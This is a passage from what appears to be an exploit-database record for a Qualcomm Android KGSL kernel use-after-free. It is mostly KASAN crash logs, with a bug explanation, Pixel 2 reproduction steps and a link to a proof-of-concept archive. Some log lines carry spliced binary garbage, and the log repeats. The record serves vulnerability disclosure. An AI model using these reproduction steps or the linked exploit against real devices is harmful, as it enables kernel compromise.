x20: 0000000000000000 \r\n<4>[ 447.805809] c3 2621 x19: ffffffbe214dbe00 x18: 0000007f7dc4ef8a \r\n<4>[ 447.811105] c3 2621 x17: 0000007f809eb0e0 x16: ffffffa68a0a5178 \r\n<4>[ 447.816400] c3 2621 x15: 0000000000000021 x14: 202c303030303030 \r\n<4>[ 447.821694] c3 2621 x13: 3030303030303030 x12: e95cc056ac940c73 \r\n<4>[ 447.826992] c3 2621 x11: ffffffd8929fb810 x10: ffffff8b12978008 \r\n<4>[ 447.832286] c3 2621 x9 : ffffff8b12978007 x8 : ffffffa68a21a558 \r\n<4>[ 447.837590] c3 2621 x7 : ffffffa68c69ec28 x6 : 0000000000000040 \r\n<4>[ 447.842872] c3 2621 x5 : 0000000000000000 x4 : ffffff87c429b7c0 \r\n<4>[ 447.848170] c3 2621 x3 : ffffffa68a04d8dc x2 : 0000000000000000 \r\n<4>[ 447.853468] c3 2621 x1 : ffffffa68ba1aa00 x0 : ffffffbe214dbe00 \r\n<4>[ 447.858765] c3 2621 \r\n<4>[ 447.858765] c3 2621 PC: 0xffffffa689e836a8:\r\n<4>[ 447.859009] c3 2621 36a8 d503201f d503201f d503201f d503201f d503201f d503201f a90007e0 a9010fe2\r\n<4>[ 447.873684] c3 2621 36c8 a90217e4 a9031fe6 a90427e8 a9052fea a90637ec a9073fee a90847f0 a9094ff2\r\n<4>[ 447.881847] c3 2621 36e8 a90a57f4 a90b5ff6 a90c67f8 a90d6ffa a90e77fc 9104c3f5 d538411c f9400794\r\n<4>[ 447.890005] c3 2621 3708 f90093f4 d2c01014 f9000794 d5384036 d5384017 a90f57fe d503201f d5382015\r\n<4>[ 447.898172] c3 2621 \r\n<4>[ 447.898172] c3 2621 LR: 0xffffffa68a04d99c:\r\n<4>[ 447.898371] c3 2621 d99c b000ce80 9113e000 97feface aa1303e0 9400affc f9400260 9117e2e1 528002a2\r\n<4>[ 447.91300BCho<D6>\r\n^@^@<90>^A+^A<98>3<8E><DA>8] c3 2621 d9bc 9106c021 8a000280 97ffff2c 17ffffe6 a9bf7bfd d2800002 910003fd 97ffffb4\r\n<4>[ 447.921170] c3 2621 d9dc a8c17bfd d65f03c0 a9ac7bfd 910003fd a90153f3 a9025bf5 a90363f7 a9046bf9\r\n<4>[ 447.929328] c3 2621 d9fc a90573fb d10443ff aa0003f3 9400afe5 aa1303e0 f8410402 f90033a2 9400af97\r\n<4>[ 447.937494] c3 2621 \r\n<4>[ 447.937494] c3 2621 SP: 0xffffffd8929b2f20:\r\n<4>[ 447.937693] c3 2621 2f20 8a04d9dc ffffffa6 929b2f60 ffffffd8 89e836e8 ffffffa6 204003c5 00000000\r\n<4>[ 447.952331] c3 2621 2f40 00000000 00000000 00000000 00000000 ffffffff ffffffff 00000000 00000000\r\n<4>[ 447.960491] c3 2621 2f60 214dbe00 ffffffbe 8ba1aa00 ffffffa6 00000000 00000000 8a04d8dc ffffffa6\r\n<4>[ 447.968651] c3 2621 2f80 c429b7c0 ffffff87 00000000 00000000 00000040 00000000 8c69ec28 ffffffa6\r\n<4>[ 447.976809] c3 2621 \r\n<0>[ 447.976941] c3 2621 Process kworker/3:3 (pid: 2621, stack limit = 0x0000000000000000)\r\n<4>[ 447.979247] c3 2621 Call trace:\r\n<4>[ 447.987122] c3 2621 Exception stack(0xffffffd8929b2d60 to 0xffffffd8929b2e90)\r\n<4>[ 447.990662] c3 2621 2d60: ffffffbe214dbe00 0000008000000000 00000000836e2000 ffffffa689e836e8\r\n<4>[ 447.997788] c3 2621 2d80: 00000000204003c5 0000000000000025 ffffffd8536fc908 0000000000000000\r\n<4>[ 448.006468] c3 2621 2da0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000\r\n<4>[ 448.015098] c3 2621 2dc0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000\r\n<4>[ 448.023777] c3 2621 2de0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000\r\n<4>[ 448.032461] c3 2621 2e00: 0000000000000000 0000000000000000 0000000000000000 0000000000000000\r\n<4>[ 448.041195] c3 2621 2e20: 0000000000000000 e95cc056ac940c73 ffffffbe214dbe00 ffffffa68ba1aa00\r\n<4>[ 448.049872] c3 2621 2e40: 0000000000000000 ffffffa68a04d8dc ffffff87c429b7c0 0000000000000000\r\n<4>[ 448.058561] c3 2621 2e60: 0000000000000040 ffffffa68c69ec28 ffffffa68a21a558 ffffff8b12978007\r\n<4>[ 448.067216] c3 2621 2e80: ffffff8b12978008 ffffffd8929fb810\r\n<4>[ 448.075867] c3 2621 [<ffffffa689e836e8>] el1_sync+0x28/0xe0\r\n<0>[ 448.081787] c3 2621 Code: a90637ec a9073fee a90847f0 a9094ff2 (a90a57f4) \r\n<4>[ 448.087496] c3 2621 ---[ end trace 8d4b2347f8b71fe7 ]---\r\n<4>[ 448.087540] c4 2684 ------------[ cut here ]------------\r\n<2>[ 448.087544] c4 2684 Kernel BUG at 0000000000000000 [verbose debug info unavailable]\r\n<0>[ 448.087547] c4 2684 Internal error: Oops - BUG: 96000005 [#2] PREEMPT SMP\r\n<4>[ 448.087553] c4 2684 Modules linked in:\r\n<4>[ 448.087561] c4 2684 CPU: 4 PID: 2684 Comm: poc Tainted: G D 4.4.116-gbcd0ecccd040-dirty #45\r\n<4>[ 448.087563] c4 2684 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)\r\n<4>[ 448.087565] c4 2684 task: 0000000000000000 task.stack: 0000000000000000\r\n<4>[ 448.087578] c4 2684 PC is at qlist_free_all+0x3c/0x80\r\n<4>[ 448.087581] c4 2684 LR is at qlist_free_all+0x7c/0x80\r\n<4>[ 448.087585] c4 2684 pc : [<ffffffa68a07bbbc>] lr : [<ffffffa68a07bbfc>] pstate: 60400145\r\n<4>[ 448.087586] c4 2684 sp : ffffffd87e3b3880\r\n<4>[ 448.087591] c4 2684 x29: ffffffd87e3b3880 x28: ffffffa68ca1a000 \r\n<4>[ 448.087595] c4 2684 x27: 000000000591e848 x26: ffffffd87e3b3920 \r\n<4>[ 448.087598] c4 2684 x25: 0000000000000140 x24: 0000000000000000 \r\n<4>[ 448.087601] c4 2684 x23: ffffffd87e3b3920 x22: ffffffa68a07bbbc \r\n<4>[ 448.087604] c4 2684 x21: 0000000000000000 x20: ffffffd8929f8040 \r\n<4>[ 448.087607] c4 2684 x19: ffffffd8929f8040 x18: 00000000c8056d20 \r\n<4>[ 448.087611] c4 2684 x17: 000000002c754130 x16: 0000000085837409 \r\n<4>[ 448.087613] c4 2684 x15: 00000000a50d5ad3 x14: 0000000000000000 \r\n<4>[ 448.087617] c4 2684 x13: 0000000001075000 x12: ffffffffffffffff \r\n<4>[ 448.087620] c4 2684 x11: 0000000000000040 x10: ffffff8b0fc76746 \r\n<4>[ 448.087623] c4 2684 x9 : ffffff8b0fc76745 x8 : ffffffd87e3b3a2b \r\n<4>[ 448.087626] c4 2684 x7 : 0000000000000000 x6 : ffffffd87e3b3a08 \r\n<4>[ 448.087629] c4 2684 x5 : fffffffffe8c0000 x4 : 0000000000000000 \r\n<4>[ 448.087632] c4 2684 x3 : fBCho<D7>\r\n^@^@<90>^A*^A<91><F9>%5fffffd8929f7ff0 x2 : 0000000000000000 \r\n<4>[ 448.087635] c4 2684 x1 : dead0000000000ff x0 : 0000000000000000 \r\n<4>[ 448.087637] c4 2684 \r\n<4>[ 448.087637] c4 2684 PC: 0xffffffa68a07bb7c:\r\n<4>[ 448.087646] c4 2684 bb7c 17fffff1 a9bc7bfd 910003fd a90153f3 a9025bf5 f9001bf7 f9400013 b4000253\r\n<4>[ 448.087655] c4 2684 bb9c 90000016 aa0103f5 aa0003f7 912ef2d6 14000002 aa1403f3 aa1503e0 b40001f5\r\n<4>[ 448.087664] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff\r\n<4>[ 448.087673] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93\r\n<4>[ 448.087675] c4 2684 \r\n<4>[ 448.087675] c4 2684 LR: 0xffffffa68a07bbbc:\r\n<4>[ 448.087684] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff\r\n<4>[ 448.087692] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93\r\n<4>[ 448.087701] c4 2684 bbfc 17fffff0 a9bc7bfd aa0003e2 910003fd a90153f3 f0012ed3 aa0003f4 b000eb40\r\n<4>[ 448.087711] c4 2684 bc1c 910083a1 d538d083 913c8000 f90013bf 8b000060 f9452a63 f9001fa3 f90017bf\r\n<4>[ 448.087712] c4 2684 \r\n<4>[ 448.087712] c4 2684 SP: 0xffffffd87e3b3840:\r\n<4>[ 448.087722] c4 2684 3840 8a07bbfc ffffffa6 7e3b3880 ffffffd8 8a07bbbc ffffffa6 60400145 00000000\r\n<4>[ 448.087731] c4 2684 3860 7e3b3920 ffffffd8 00000000 00000000 00000000 00000080 8b4ddfd0 ffffffa6\r\n<4>[ 448.087740] c4 2684 3880 7e3b38c0 ffffffd8 8a07bf9c ffffffa6 8c656000 ffffffa6 8ca1f500 ffffffa6\r\n<4>[ 448.087749] c4 2684 38a0 8ca1a000 ffffffa6 000000f7 00000000 8c68d000 ffffffa6 fabb3a00 ffffffd7\r\n<4>[ 448.087750] c4 2684 \r\n<0>[ 448.087753] c4 2684 Process poc (pid: 2684, stack limit = 0x0000000000000000)\r\n<4>[ 448.087754] c4 2684 Call trace:\r\n<4>[ 448.087758] c4 2684 Exception stack(0xffffffd87e3b3680 to 0xffffffd87e3b37b0)\r\n<4>[ 448.087763] c4 2684 3680: ffffffd8929f8040 0000008000000000 00000000836e2000 ffffffa68a07bbbc\r\n<4>[ 448.087768] c4 2684 36a0: 0000000060400145 0000000000000025 0000000000000140 ffffffd7fabb3a00\r\n<4>[ 448.087773] c4 2684 36c0: 0000000000000000 ffffffd87e3b37d0 ffffffd87e3b3720 ffffffa68a0768e0\r\n<4>[ 448.087779] c4 2684 36e0: ffffffbe224a7d80 0000000000000000 ffffffd7fabb3a00 ffffffd7fabb3a00\r\n<4>[ 448.087784] c4 2684 3700: 0000000100150015 ffffffd8929f7e00 0000000180150014 ffffffd899803b00\r\n<4>[ 448.087789] c4 2684 3720: ffffffd87e3b3830 ffffffa68a078b38 ffffffbe224a7d80 ffffffd8929f7ff0\r\n<4>[ 448.087794] c4 2684 3740: ffffffd7fabb3a00 e95cc056ac940c73 0000000000000000 dead0000000000ff\r\n<4>[ 448.087799] c4 2684 3760: 0000000000000000 ffffffd8929f7ff0 0000000000000000 fffffffffe8c0000\r\n<4>[ 448.087804] c4 2684 3780: ffffffd87e3b3a08 0000000000000000 ffffffd87e3b3a2b ffffff8b0fc76745\r\n<4>[ 448.087808] c4 2684 37a0: ffffff8b0fc76746 0000000000000040\r\n<4>[ 448.087813] c4 2684 [<ffffffa68a07bbbc>] qlist_free_all+0x3c/0x80\r\n<4>[ 448.087819] c4 2684 [<ffffffa68a07bf9c>] quarantine_reduce+0x17c/0x1a0\r\n<4>[ 448.087824] c4 2684 [<ffffffa68a07a1b4>] kasan_kmalloc+0xe0/0xe4\r\n<4>[ 448.087828] c4 2684 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c\r\n<4>[ 448.087832] c4 2684 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c\r\n<4>[ 448.087840] c4 2684 [<ffffffa68a15d0dc>] ext4_inode_attach_jinode+0x9c/0x118\r\n<4>[ 448.087844] c4 2684 [<ffffffa68a150d74>] ext4_file_open+0xc8/0x21c\r\n<4>[ 448.087848] c4 2684 [<ffffffa68a087488>] do_dentry_open+0x350/0x4ec\r\n<4>[ 448.087851] c4 2684 [<ffffffa68a087930>] finish_open+0x74/0xa8\r\n<4>[ 448.087857] c4 2684 [<ffffffa68a09fa34>] path_openat+0x980/0x1404\r\n<4>[ 448.087861] c4 2684 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188\r\n<4>[ 448.087866] c4 2684 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4\r\n<4>[ 448.087869] c4 2684 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18\r\n<4>[ 448.087875] c4 2684 [<ffffffa689e842b0>] el0_svc_naked+0x24/0x28\r\n<0>[ 448.087881] c4 2684 Code: 14000002 aa1403f3 aa1503e0 b40001f5 (b980c401) \r\n<4>[ 448.087944] c4 2684 ---[ end trace 8d4DBGC\r\n==================================\r\n\r\nThe KASAN report points to instruction 267c in the following assembly:\r\n\r\n==================================\r\n0000000000002630 <set_page_dirty>:\r\n{\r\n 2630: a9bd7bfd stp x29, x30, [sp, #-48]!\r\n 2634: 910003fd mov x29, sp\r\n 2638: a90153f3 stp x19, x20, [sp, #16]\r\n 263c: f90013f5 str x21, [sp, #32]\r\n 2640: aa0003f3 mov x19, x0\r\n struct address_space *mapping = page_mapping(page);\r\n 2644: 94000000 bl 0 <page_mapping>\r\n 2648: aa0003f4 mov x20, x0\r\n 264c: d5384115 mrs x21, sp_el0\r\n if (current->jh_task_flags && mapping)\r\n 2650: 9128a2a0 add x0, x21, #0xa28\r\n 2654: 94000000 bl 0 <__asan_load4>\r\n 2658: b94a2aa0 ldr w0, [x21, #2600]\r\n 265c: 340000a0 cbz w0, 2670 <set_page_dirty+0x40>\r\n 2660: b40003b4 cbz x20, 26d4 <set_page_dirty+0xa4>\r\n msleep(500);\r\n 2664: 52803e80 mov w0, #0x1f4 // #500\r\n 2668: 94000000 bl 0 <msleep>\r\n 266c: 14000002 b 2674 <set_page_dirty+0x44>\r\n if (likely(mapping)) {\r\n 2670: b4000334 cbz x20, 26d4 <set_page_dirty+0xa4>\r\n int (*spd)(struct page *) = mapping->a_ops->set_page_dirty;\r\n 2674: 9101a280 add x0, x20, #0x68\r\n 2678: 94000000 bl 0 <__asan_load8>\r\n 267c: f9403694 ldr x20, [x20, #104]\r\n 2680: 91006280 add x0, x20, #0x18\r\n 2684: 94000000 bl 0 <__asan_load8>\r\n 2688: f9400e94 ldr x20, [x20, #24]\r\n 268c: aa1303e0 mov x0, x19\r\n 2690: 94000000 bl 0 <__asan_load8>\r\n 2694: f9400260 ldr x0, [x19]\r\n==================================\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46941.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46941"}], "zdt": [{"lastseen": "2019-05-30T07:54:51", "bulletinFamily": "exploit", "description": "Exploit for Android platform in category dos / poc", "modified": "2019-05-29T00:00:00", "published": "2019-05-29T00:00:00", "id": "1337DAY-ID-32820", "href": "https://0day.today/exploit/description/32820", "title": "Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL Exploit", "type": "zdt", "sourceData": "The following issue exists in the android-msm-wahoo-4.4-pie branch of\r\nhttps://android.googlesource.com/kernel/msm (and possibly others):\r\n\r\nWhen kgsl_mem_entry_destroy() in drivers/gpu/msm/kgsl.c is called for a writable\r\nentry with memtype KGSL_MEM_ENTRY_USER, it attempts to mark the entry's pages\r\nas dirty using the function set_page_dirty(). This function first loads\r\npage->mapping using page_mapping(), then calls the function pointer\r\nmapping->a_ops->set_page_dirty.\r\n\r\nThe bug is that, as explained in upstream commit e92bb4dd9673\r\n( https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e92bb4dd9673945179b1fc738c9817dd91bfb629),\r\nthe mapping of a page can be freed concurrently unless it is protected somehow\r\n(e.g. by holding the page lock, or by holding a reference to the mapping).\r\nFor callers who don't hold any such lock or reference, set_page_dirty_lock() is\r\nprovided to safely mark a page as dirty:\r\n\r\n==================================\r\n/*\r\n * set_page_dirty() is racy if the caller has no reference against\r\n * page->mapping->host, and if the page is unlocked. This is because another\r\n * CPU could truncate the page off the mapping and then free the mapping.\r\n *\r\n * Usually, the page _is_ locked, or the caller is a user-space process which\r\n * holds a reference on the inode by having an open file.\r\n *\r\n * In other cases, the page should be locked before running set_page_dirty().\r\n */\r\nint set_page_dirty_lock(struct page *page)\r\n{\r\n int ret;\r\n\r\n lock_page(page);\r\n ret = set_page_dirty(page);\r\n unlock_page(page);\r\n return ret;\r\n}\r\n==================================\r\n\r\n\r\nTo reproduce on a Pixel 2 (walleye):\r\n\r\n - Check out the tree specified above.\r\n - Enable KASAN in the kernel config.\r\n - Apply the attached kernel patch kgsl-bigger-race-window.patch to make the\r\n race window much bigger.\r\n - Build and boot the kernel.\r\n - Build the attached poc.c with\r\n `aarch64-linux-gnu-gcc -static -o poc poc.c -Wall`.\r\n - Run the PoC on the device (adb push, then run from adb shell).\r\n\r\nYou should see a kernel crash like this; note KASAN's report of a UAF in\r\nset_page_dirty():\r\n\r\n==================================\r\n<6>[ 445.698708] c3 688 mdss_fb_blank_sub: mdss_fb_blank+0x1d0/0x2b4 mode:0\r\n<3>[ 447.372706] c3 2621 ==================================================================\r\n<3>[ 447.372963] c3 2621 BUG: KASAN: use-after-free in set_page_dirty+0x4c/0xd0\r\n<3>[ 447.380051] c3 2621 Read of size 8 at addr 0000000000000000 by task kworker/3:3/2621\r\n<3>[ 447.387059] c3 2621 \r\n<4>[ 447.394762] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45\r\n<4>[ 447.397158] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)\r\n<4>[ 447.406473] c3 2621 Workqueue: kgsl-mementry _deferred_put\r\n<4>[ 447.418479] c3 2621 Call trace:\r\n<4>[ 447.418660] c3 2621 [<ffffffa689e8dfbc>] dump_backtrace+0x0/0x2b4\r\n<4>[ 447.421952] c3 2621 [<ffffffa689e8e394>] show_stack+0x14/0x1c\r\n<4>[ 447.428066] c3 2621 [<ffffffa68a2f3d2c>] dump_stack+0xa4/0xcc\r\n<4>[ 447.433965] c3 2621 [<ffffffa68a07b254>] print_address_description+0x94/0x340\r\n<4>[ 447.439870] c3 2621 [<ffffffa68a07b784>] kasan_report+0x1f8/0x340\r\n<4>[ 447.447145] c3 2621 [<ffffffa68a079a10>] __asan_load8+0x74/0x90\r\n<4>[ 447.453407] c3 2621 [<ffffffa68a0205b4>] set_page_dirty+0x4c/0xd0\r\n<4>[ 447.459621] c3 2621 [<ffffffa68a6c5dec>] kgsl_mem_entry_destroy+0x1c0/0x218\r\n<4>[ 447.465695] c3 2621 [<ffffffa68a6c63d8>] _deferred_put+0x34/0x3c\r\n<4>[ 447.473017] c3 2621 [<ffffffa689edc124>] process_one_work+0x254/0x78c\r\n<4>[ 447.479093] c3 2621 [<ffffffa689edc6f4>] worker_thread+0x98/0x718\r\n<4>[ 447.485551] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130\r\n<4>[ 447.491801] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40\r\n<3>[ 447.497696] c3 2621 \r\n<3>[ 447.503818] c3 2621 Allocated by task 2684:\r\n<4>[ 447.506206] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8\r\n<4>[ 447.511847] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20\r\n<4>[ 447.517829] c3 2621 [<ffffffa68a079e74>] kasan_kmalloc.part.5+0x50/0x124\r\n<4>[ 447.523494] c3 2621 [<ffffffa68a07a198>] kasan_kmalloc+0xc4/0xe4\r\n<4>[ 447.529547] c3 2621 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c\r\n<4>[ 447.534931] c3 2621 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c\r\n<4>[ 447.540572] c3 2621 [<ffffffa68a187bdc>] ext4_alloc_inode+0x28/0x234\r\n<4>[ 447.546387] c3 2621 [<ffffffa68a0afe94>] alloc_inode+0x34/0xd0\r\n<4>[ 447.552112] c3 2621 [<ffffffa68a0b19e8>] new_inode+0x20/0xe8\r\n<4>[ 447.557318] c3 2621 [<ffffffa68a154214>] __ext4_new_inode+0xe8/0x1f00\r\n<4>[ 447.562360] c3 2621 [<ffffffa68a17087c>] ext4_tmpfile+0xb4/0x230\r\n<4>[ 447.568172] c3 2621 [<ffffffa68a09f9e8>] path_openat+0x934/0x1404\r\n<4>[ 447.573556] c3 2621 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188\r\n<4>[ 447.579027] c3 2621 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4\r\n<4>[ 447.584407] c3 2621 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18\r\n<4>[ 447.589787] c3 2621 [<ffffffa689e842b0BCho<D5>\r\n^@^@<90>^A,^A^Hp<D6>M>] el0_svc_naked+0x24/0x28\r\n<3>[ 447.594909] c3 2621 \r\n<3>[ 447.599065] c3 2621 Freed by task 36:\r\n<4>[ 447.601330] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8\r\n<4>[ 447.606461] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20\r\n<4>[ 447.612450] c3 2621 [<ffffffa68a07aa1c>] kasan_slab_free+0xb0/0x1c0\r\n<4>[ 447.618091] c3 2621 [<ffffffa68a0770c0>] kmem_cache_free+0x80/0x2f8\r\n<4>[ 447.623733] c3 2621 [<ffffffa68a1863f8>] ext4_i_callback+0x18/0x20\r\n<4>[ 447.629363] c3 2621 [<ffffffa689f5c430>] rcu_nocb_kthread+0x20c/0x264\r\n<4>[ 447.634926] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130\r\n<4>[ 447.640726] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40\r\n<3>[ 447.645765] c3 2621 \r\n<3>[ 447.649913] c3 2621 The buggy address belongs to the object at 0000000000000000\r\n<3>[ 447.649913] c3 2621 which belongs to the cache ext4_inode_cache of size 1048\r\n<3>[ 447.652315] c3 2621 The buggy address is located 680 bytes inside of\r\n<3>[ 447.652315] c3 2621 1048-byte region [0000000000000000, 0000000000000000)\r\n<3>[ 447.667170] c3 2621 The buggy address belongs to the page:\r\n<1>[ 447.680933] c3 2621 Unable to handle kernel paging request at virtual address ffffffd8929b3000\r\n<1>[ 447.686392] c3 2621 pgd = 0000000000000000\r\n<1>[ 447.695099] c3 2621 [ffffffd8929b3000] *pgd=0000000000000000, *pud=0000000000000000\r\n<4>[ 447.706506] c3 2621 ------------[ cut here ]------------\r\n<2>[ 447.706664] c3 2621 Kernel BUG at 0000000000000000 [verbose debug info unavailable]\r\n<0>[ 447.711676] c3 2621 Internal error: Oops - BUG: 96000047 [#1] PREEMPT SMP\r\n<4>[ 447.719517] c3 2621 Modules linked in:\r\n<4>[ 447.729365] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45\r\n<4>[ 447.729573] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)\r\n<4>[ 447.738760] c3 2621 Workqueue: kgsl-mementry _deferred_put\r\n<4>[ 447.750779] c3 2621 task: 0000000000000000 task.stack: 0000000000000000\r\n<4>[ 447.750972] c3 2621 PC is at el1_sync+0x28/0xe0\r\n<4>[ 447.757719] c3 2621 LR is at dump_page+0x10/0x18\r\n<4>[ 447.762390] c3 2621 pc : [<ffffffa689e836e8>] lr : [<ffffffa68a04d9dc>] pstate: 204003c5\r\n<4>[ 447.767106] c3 2621 sp : ffffffd8929b2f60\r\n<4>[ 447.775306] c3 2621 x29: ffffffd8929b4000 x28: ffffffd88e9a47d0 \r\n<4>[ 447.784631] c3 2621 x27: ffffffd8294fab80 x26: ffffffa68ba1f000 \r\n<4>[ 447.789927] c3 2621 x25: ffffffd8536fc908 x24: ffffffd8536fc4e8 \r\n<4>[ 447.795219] c3 2621 x23: ffffffd892e55500 x22: 0000000000000001 \r\n<4>[ 447.800513] c3 2621 x21: ffffffa68ba1aa00 x20: 0000000000000000 \r\n<4>[ 447.805809] c3 2621 x19: ffffffbe214dbe00 x18: 0000007f7dc4ef8a \r\n<4>[ 447.811105] c3 2621 x17: 0000007f809eb0e0 x16: ffffffa68a0a5178 \r\n<4>[ 447.816400] c3 2621 x15: 0000000000000021 x14: 202c303030303030 \r\n<4>[ 447.821694] c3 2621 x13: 3030303030303030 x12: e95cc056ac940c73 \r\n<4>[ 447.826992] c3 2621 x11: ffffffd8929fb810 x10: ffffff8b12978008 \r\n<4>[ 447.832286] c3 2621 x9 : ffffff8b12978007 x8 : ffffffa68a21a558 \r\n<4>[ 447.837590] c3 2621 x7 : ffffffa68c69ec28 x6 : 0000000000000040 \r\n<4>[ 447.842872] c3 2621 x5 : 0000000000000000 x4 : ffffff87c429b7c0 \r\n<4>[ 447.848170] c3 2621 x3 : ffffffa68a04d8dc x2 : 0000000000000000 \r\n<4>[ 447.853468] c3 2621 x1 : ffffffa68ba1aa00 x0 : ffffffbe214dbe00 \r\n<4>[ 447.858765] c3 2621 \r\n<4>[ 447.858765] c3 2621 PC: 0xffffffa689e836a8:\r\n<4>[ 447.859009] c3 2621 36a8 d503201f d503201f d503201f d503201f d503201f d503201f a90007e0 a9010fe2\r\n<4>[ 447.873684] c3 2621 36c8 a90217e4 a9031fe6 a90427e8 a9052fea a90637ec a9073fee a90847f0 a9094ff2\r\n<4>[ 447.881847] c3 2621 36e8 a90a57f4 a90b5ff6 a90c67f8 a90d6ffa a90e77fc 9104c3f5 d538411c f9400794\r\n<4>[ 447.890005] c3 2621 3708 f90093f4 d2c01014 f9000794 d5384036 d5384017 a90f57fe d503201f d5382015\r\n<4>[ 447.898172] c3 2621 \r\n<4>[ 447.898172] c3 2621 LR: 0xffffffa68a04d99c:\r\n<4>[ 447.898371] c3 2621 d99c b000ce80 9113e000 97feface aa1303e0 9400affc f9400260 9117e2e1 528002a2\r\n<4>[ 447.91300BCho<D6>\r\n^@^@<90>^A+^A<98>3<8E><DA>8] c3 2621 d9bc 9106c021 8a000280 97ffff2c 17ffffe6 a9bf7bfd d2800002 910003fd 97ffffb4\r\n<4>[ 447.921170] c3 2621 d9dc a8c17bfd d65f03c0 a9ac7bfd 910003fd a90153f3 a9025bf5 a90363f7 a9046bf9\r\n<4>[ 447.929328] c3 2621 d9fc a90573fb d10443ff aa0003f3 9400afe5 aa1303e0 f8410402 f90033a2 9400af97\r\n<4>[ 447.937494] c3 2621 \r\n<4>[ 447.937494] c3 2621 SP: 0xffffffd8929b2f20:\r\n<4>[ 447.937693] c3 2621 2f20 8a04d9dc ffffffa6 929b2f60 ffffffd8 89e836e8 ffffffa6 204003c5 00000000\r\n<4>[ 447.952331] c3 2621 2f40 00000000 00000000 00000000 00000000 ffffffff ffffffff 00000000 00000000\r\n<4>[ 447.960491] c3 2621 2f60 214dbe00 ffffffbe 8ba1aa00 ffffffa6 00000000 00000000 8a04d8dc ffffffa6\r\n<4>[ 447.968651] c3 2621 2f80 c429b7c0 ffffff87 00000000 00000000 00000040 00000000 8c69ec28 ffffffa6\r\n<4>[ 447.976809] c3 2621 \r\n<0>[ 447.976941] c3 2621 Process kworker/3:3 (pid: 2621, stack limit = 0x0000000000000000)\r\n<4>[ 447.979247] c3 2621 Call trace:\r\n<4>[ 447.987122] c3 2621 Exception stack(0xffffffd8929b2d60 to 0xffffffd8929b2e90)\r\n<4>[ 447.990662] c3 2621 2d60: ffffffbe214dbe00 0000008000000000 00000000836e2000 ffffffa689e836e8\r\n<4>[ 447.997788] c3 2621 2d80: 00000000204003c5 0000000000000025 ffffffd8536fc908 0000000000000000\r\n<4>[ 448.006468] c3 2621 2da0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000\r\n<4>[ 448.015098] c3 2621 2dc0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000\r\n<4>[ 448.023777] c3 2621 2de0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000\r\n<4>[ 448.032461] c3 2621 2e00: 0000000000000000 0000000000000000 0000000000000000 0000000000000000\r\n<4>[ 448.041195] c3 2621 2e20: 0000000000000000 e95cc056ac940c73 ffffffbe214dbe00 ffffffa68ba1aa00\r\n<4>[ 448.049872] c3 2621 2e40: 0000000000000000 ffffffa68a04d8dc ffffff87c429b7c0 0000000000000000\r\n<4>[ 448.058561] c3 2621 2e60: 0000000000000040 ffffffa68c69ec28 ffffffa68a21a558 ffffff8b12978007\r\n<4>[ 448.067216] c3 2621 2e80: ffffff8b12978008 ffffffd8929fb810\r\n<4>[ 448.075867] c3 2621 [<ffffffa689e836e8>] el1_sync+0x28/0xe0\r\n<0>[ 448.081787] c3 2621 Code: a90637ec a9073fee a90847f0 a9094ff2 (a90a57f4) \r\n<4>[ 448.087496] c3 2621 ---[ end trace 8d4b2347f8b71fe7 ]---\r\n<4>[ 448.087540] c4 2684 ------------[ cut here ]------------\r\n<2>[ 448.087544] c4 2684 Kernel BUG at 0000000000000000 [verbose debug info unavailable]\r\n<0>[ 448.087547] c4 2684 Internal error: Oops - BUG: 96000005 [#2] PREEMPT SMP\r\n<4>[ 448.087553] c4 2684 Modules linked in:\r\n<4>[ 448.087561] c4 2684 CPU: 4 PID: 2684 Comm: poc Tainted: G D 4.4.116-gbcd0ecccd040-dirty #45\r\n<4>[ 448.087563] c4 2684 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)\r\n<4>[ 448.087565] c4 2684 task: 0000000000000000 task.stack: 0000000000000000\r\n<4>[ 448.087578] c4 2684 PC is at qlist_free_all+0x3c/0x80\r\n<4>[ 448.087581] c4 2684 LR is at qlist_free_all+0x7c/0x80\r\n<4>[ 448.087585] c4 